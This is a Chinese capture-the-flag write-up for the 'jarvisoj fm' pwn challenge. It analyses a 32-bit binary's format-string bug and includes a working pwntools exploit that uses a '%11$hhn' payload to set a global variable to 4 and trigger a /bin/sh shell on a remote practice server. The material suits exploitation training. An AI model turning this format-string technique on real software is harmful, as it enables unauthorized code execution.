jarvisoj fm

# jarvisoj fm

# 前提

# 查看文件保护

[*] '/root/pwn/buuctf/jarvisoj_fm/fm'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

1
2
3
4
5
6

# 静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+2Ch] [ebp-5Ch]
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(&buf, 0, 0x50u);
  read(0, &buf, 0x50u);
  printf(&buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

# 思路分析

目前信息：
- 明显的格式化字符串漏洞
- x在bss段上
- x=4时执行后门函数
- No PIE
思路：
- 利用格式化字符串漏洞修改bss段上的x的值为4

# exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_fm/fm'
io = remote('node4.buuoj.cn', 26744)
# io = process(pwnfile)
elf = ELF(pwnfile)
x_addr = 0x804A02C
payload = flat([x_addr, '%11$hhn'])
io.send(payload)
io.interactive()

1
2
3
4
5
6
7
8
9
10

#buuctf #pwn #FormatString

上次更新: 2022/08/15, 00:29:49

← bjdctf 2020 babyrop2 pwn2 sctf 2016→